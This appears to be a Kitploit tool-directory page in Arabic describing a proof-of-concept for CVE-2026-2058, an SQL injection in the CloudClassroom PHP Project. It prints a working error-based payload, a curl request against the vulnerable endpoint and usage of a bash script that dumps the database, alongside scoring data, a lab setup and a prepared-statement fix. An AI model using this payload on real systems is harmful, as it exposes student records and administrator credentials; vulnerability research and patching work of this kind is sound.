Skip to content
KitploitKITPLOIT
أدواتعمليات الاستغلالالمدونة
Log in
إرسال
أدواتعمليات الاستغلالالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

الخلاصاتاتصالالخصوصية© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2026-2058-PoC — إثبات مفهوم لاستغلال CVE-2026-2058، وهو حقن SQL في مشروع CloudClassroom PHP، مع تعداد تلقائي لقاعدة البيانات واستخراج البيانات. | Kitploit
أدوات/GitHubGitHub/carlosalbertotuma/cve-2026-2058-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبالتعلم والتعليممختبرات وتدريب عملي
GitHubcarlosalbertotuma/cve-2026-2058-poc

CVE-2026-2058-PoC

إثبات مفهوم لاستغلال CVE-2026-2058، وهو حقن SQL في مشروع CloudClassroom PHP، مع تعداد تلقائي لقاعدة البيانات واستخراج البيانات.

عرض المستودع
15منذ 6 أشهرلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2026-2058-PoC – ثغرة حقن SQL في مشروع CloudClassroom PHP

نظرة عامة

توجد ثغرة حقن SQL في وظيفة استعلام المشاركات (Post Query) في مشروع CloudClassroom PHP (الإصدار 1.0).

تسمح الثغرة للمهاجمين بحقن أوامر SQL عشوائية عبر معامل POST المسمى squeryx، مما يؤدي إلى تعداد قاعدة البيانات واستخراج البيانات.

يحتوي هذا المستودع على إثبات مفهوم (PoC) لاستغلال الثغرة يوضح كيفية إساءة استخدامها لاستخراج بيانات حساسة من قاعدة البيانات الخلفية.


معلومات الثغرة

الحقلالقيمة
CVECVE-2026-2058
نوع الثغرةحقن SQL
CWECWE-89
البرنامج المتأثرمشروع CloudClassroom PHP
الإصدار المتأثر1.0
المكوّنوظيفة استعلام المشاركات
ناقل الهجومعن بُعد
المصادقة المطلوبةلا
التأثيركشف قاعدة البيانات
الخطورةعالية
مرجع نمط الهجومCAPEC-66

نقطة النهاية المتأثرة

POST /postquerypublic

المعامل المتأثر

squeryx

السبب الجذري

يقوم الكود الخلفي بدمج إدخال المستخدم مباشرة في استعلام SQL دون تنقية مناسبة أو استخدام استعلامات معلمة.

مثال على الكود المعرض للثغرة:

$sql = "INSERT INTO query(Query, Eid) VALUES ('$tempsquery','$tempseid')";

نظرًا لأن $tempsquery مشتق من إدخال المستخدم، يمكن للمهاجمين حقن SQL عشوائي.


إعداد بيئة الاختبار المتأثرة (Docker)

لأغراض الاختبار والبحث، تتوفر بيئة Docker متأثرة بالثغرة.

تشغيل التطبيق المتأثر

docker run -d --name cloudclassroom-lab -p 9292:80 bladscan/cloudclassroom-sqli:1.0

إثبات المفهوم

يمكن استغلال الثغرة باستخدام تقنية حقن SQL القائم على الأخطاء بالاستفادة من دالة updatexml() في MySQL.

مثال على الحمولة:

a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1

الاستغلال اليدوي

مثال على طلب curl:

curl -X POST http://TARGET/postquerypublic \
-H "Content-Type: application/x-www-form-urlencoded" \
--data-urlencode "gnamex=test" \
--data-urlencode "[email protected]" \
--data-urlencode "squeryx=a' AND updatexml(1,concat(0x7e,(SELECT database()),0x7e),1) AND '1'='1" \
--data-urlencode "update=Post Query!"

الاستجابة المتوقعة:

XPATH syntax error: '~cc_db~'

سكربت الاستغلال

يتضمن هذا المستودع سكربت استغلال بلغة bash يقوم تلقائيًا بـ:

  • استخراج اسم قاعدة البيانات
  • تعداد الجداول
  • تعداد الأعمدة
  • تفريغ بيانات الجداول

طريقة الاستخدام

chmod +x cloudclassroom_sqli_exploit.sh

./cloudclassroom_sqli_exploit.sh http://TARGET/postquerypublic

مثال:

./cloudclassroom_sqli_exploit.sh http://192.168.1.10/postquerypublic

التأثير

يمكن للمهاجم:

  • تعداد بنية قاعدة البيانات
  • استخراج بيانات حساسة
  • الحصول على بيانات اعتماد المسؤول
  • الوصول إلى سجلات الطلاب
  • اختراق قاعدة البيانات الخلفية بالكامل

درجة CVSS

NIST NVD

  • الدرجة الأساسية: 9.8 (حرجة)
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H

CNA (VulDB)

  • الدرجة الأساسية: 7.3 (عالية)
  • المتجه: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

⚠️ ملاحظة: تختلف درجة CVSS في NVD عن درجة CNA (VulDB) بسبب اختلاف تقييمات التأثير.


EPSS (نظام تسجيل توقع الاستغلال)

يقدر نظام تسجيل توقع الاستغلال (EPSS) احتمالية استغلال الثغرة في البيئات الحقيقية.

CVEاحتمالية EPSSالنسبة المئويةالتاريخ
CVE-2026-20580.000287.62 %2026-03-01

المصدر: مجموعة بيانات FIRST EPSS


التخفيف

يجب على المطورين:

  • استخدام العبارات المعدة مسبقًا (prepared statements)
  • تنفيذ التحقق من صحة الإدخال
  • تهريب إدخال المستخدم بشكل صحيح
  • تطبيق أذونات قاعدة بيانات بأقل صلاحيات

مثال على التنفيذ الآمن:

$stmt = $conn->prepare("INSERT INTO query(Query, Eid) VALUES (?, ?)");
$stmt->bind_param("ss", $tempsquery, $tempseid);
$stmt->execute();

لقطات الشاشة

استغلال حقن SQL

image
image

المراجع

  • https://cwe.mitre.org/data/definitions/89.html
  • https://owasp.org/Top10/2025/A05_2025-Injection/
  • https://capec.mitre.org/data/definitions/66.html
  • https://github.com/OWASP/www-project-web-security-testing-guide/blob/master/latest/4-Web_Application_Security_Testing/07-Input_Validation_Testing/05-Testing_for_SQL_Injection.md

إخلاء المسؤولية

تم توفير هذا الاستغلال لأغراض تعليمية وبحثية فقط.

المؤلف غير مسؤول عن إساءة الاستخدام أو الأضرار الناجمة عن هذا الكود.


المؤلف

bl4dsc4n

باحث أمني

تنزيل الأداة